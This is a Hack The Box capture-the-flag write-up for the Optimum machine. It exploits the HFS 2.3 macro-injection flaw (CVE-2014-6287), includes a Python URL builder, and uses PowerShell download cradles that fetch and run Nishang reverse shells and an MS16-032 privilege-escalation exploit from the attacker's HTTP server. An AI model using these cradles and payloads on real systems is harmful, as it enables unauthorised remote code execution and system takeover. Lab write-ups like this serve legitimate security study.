HTB Optimum Write-up (Windows) - PowerShell DownloadString, HFS File Server 2.3 Vuln, Sherlock

What I learned:

  • PowerShell download cradle one-liner: fetch a script over HTTP and run it in memory with IEX, so nothing is written to disk

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125:80/ms16-032.ps1')

HTTP Enum:

HttpFileServer 2.3

Searchsploit result:

https://www.exploit-db.com/exploits/49584

This exploit worked, but IppSec's walkthrough video does it in a better way, driving the macro injection by hand as described below.

HFS (Rejetto HTTP File Server) has a built-in macro language.

Version 2.3 is vulnerable to remote code execution (CVE-2014-6287): a null byte (%00) at the start of the search parameter stops HFS from sanitising the rest of the string, so everything after it is handed straight to the macro interpreter.

We can execute commands with the following syntax, according to the HFS macro wiki page:

exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
Example: {.exec|notepad.}

We can confirm this by requesting (IP_ADDRESS is our tun0 address; note the closing "." before the "}", as in the wiki example):

http://10.129.1.127/?search=%00{.exec|ping IP_ADDRESS.}

and, before sending it, starting tcpdump on tun0 to catch the ICMP echo requests the command produces (add an icmp filter if the interface is noisy):

tcpdump -i tun0

Echo requests arriving from the target means the macro ran, so we have command execution.

Windows comes in 32-bit and 64-bit builds, and on 64-bit Windows a 32-bit process (HFS is one) gets its view of the file system redirected by WoW64:

  1. C:\Windows\System32 -> from a 32-bit process this is silently redirected to the 32-bit binaries

  2. C:\Windows\SysWOW64 -> the 32-bit binaries, which is where the redirect above actually lands

  3. C:\Windows\SysNative -> an alias only visible to 32-bit processes that reaches the real 64-bit System32

So we will go through SysNative to get the 64-bit PowerShell, and first check that the ping still works when run through it:

http://10.129.1.127/?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping IP.}

Once confirmed, we can use the Nishang toolset: Shells > Invoke-PowerShellTcp.ps1. Copy it somewhere else, as we need to modify it a bit.

At the end of the script, add one line so the function is called as soon as the file is loaded with IEX:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.125 -Port 4444

Then start a netcat (nc) listener on that port and serve the script over HTTP from our box before triggering it.

Finally, make the server fetch and execute the script in memory by requesting (spaces as %20, single quotes as %27):

http://10.129.1.127/?search=%00{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http://10.10.14.125:80/Invoke-PowerShellTcp.ps1%27).}

And now we get a user shell!
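Putting the three requests above together, here is a small Python helper that builds the null-byte search URLs for the ping check, the SysNative PowerShell check and the Nishang cradle. It is an added example for these notes, not the exploit-db script and not IppSec's code; the target and attacker addresses are the ones from the notes reused as placeholders, and the `{: ... :}` quoting it applies to commands containing a pipe follows the HFS macro wiki rather than anything on this page. The same cradle function is what later fetches Sherlock and the MS16-032 script.

```python
"""Build the HFS 2.3 macro-injection requests used in this write-up.

Added example for these notes; not the exploit-db script and not IppSec's
code. Addresses are the ones from the notes, reused as constructed placeholders.
"""
import urllib.parse
import urllib.request

# HFS is a 32-bit process, so on 64-bit Windows the 64-bit PowerShell is reached
# through the SysNative alias instead of System32 (which WoW64 would redirect).
PS64 = r"c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe"

# Characters left unencoded so the URL stays readable like the hand-typed ones:
# macro braces and pipe, path separators, and the PowerShell parentheses.
# Spaces, quotes and everything else get percent-encoded.
SAFE = "{}|.:/\\()"


def hfs_exec_macro(command: str) -> str:
    """Wrap a command in the HFS exec macro: {.exec|<command>.}

    '|' separates macro parameters, so a command that itself contains a pipe
    is wrapped in HFS macro quoting ({: ... :}, per the HFS macro wiki) first.
    """
    if "|" in command:
        command = "{:" + command + ":}"
    return "{.exec|" + command + ".}"


def hfs_search_url(base: str, macro: str) -> str:
    """Put the macro into the ?search= parameter behind a NUL byte.

    The leading %00 is the bug: HFS stops sanitising the search string at the
    null byte, and everything after it reaches the macro interpreter.
    """
    return base.rstrip("/") + "/?search=%00" + urllib.parse.quote(macro, safe=SAFE)


def powershell_cradle(script_url: str) -> str:
    """64-bit PowerShell download cradle: fetch a .ps1 and IEX it in memory.

    Nothing is written to the target's disk; the script is served from our own
    HTTP server (e.g. python3 -m http.server 80 in the directory holding it).
    """
    return f"{PS64} IEX(New-Object Net.WebClient).DownloadString('{script_url}')"


def send(url: str, timeout: float = 5.0) -> int:
    """Fire the request and return the HTTP status.

    HFS answers with its search page (200) whether or not the command did
    anything, so confirm execution out of band: tcpdump for the ping, the
    netcat listener for the shell.
    """
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    target = "http://10.129.1.127"
    attacker = "10.10.14.125"

    # Step 1: blind check, watch for ICMP on tun0.
    print(hfs_search_url(target, hfs_exec_macro(f"ping {attacker}")))

    # Step 2: the same check through the 64-bit PowerShell.
    print(hfs_search_url(target, hfs_exec_macro(f"{PS64} ping {attacker}")))

    # Step 3: stage the Nishang reverse shell (nc listener must already be up).
    cradle = powershell_cradle(f"http://{attacker}/Invoke-PowerShellTcp.ps1")
    print(hfs_search_url(target, hfs_exec_macro(cradle)))
```

Run it to print the three URLs, then paste each into the browser or pass it to send(); the HTTP status tells you nothing about whether the command ran, which is why the ping-plus-tcpdump check comes first.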

The same cradle can fetch privilege-escalation scripts too.

---

Priv Esc

Since we already have PowerShell running on the server, let's use Sherlock, a PowerShell script that checks which patches are missing for a set of known local privilege-escalation exploits.

Edit the Sherlock script and add the function call we want at the end, so it runs as soon as the script is loaded with IEX:

In this case, Find-AllVulns

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.125:80/Sherlock.ps1')

Sherlock reports three missing patches with known exploits:

  • MS16-032, MS16-034, MS16-135

Try MS16-032 (exploit-db 39719, Invoke-MS16032).

At the end of that script, append a call that uses the cradle again to pull a second reverse shell:

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.119.188:80/shell.ps1')"

Copy the Nishang TCP reverse-shell script (as shell.ps1) into the same web root, change its port so it does not collide with the listener already holding the user shell, and start the Python HTTP server to host both. Then load the exploit through the cradle:

IEX(New-Object Net.WebClient).downloadString('http://192.168.119.188:80/39719.ps1')

Start nc on the new port before running it.

It worked!
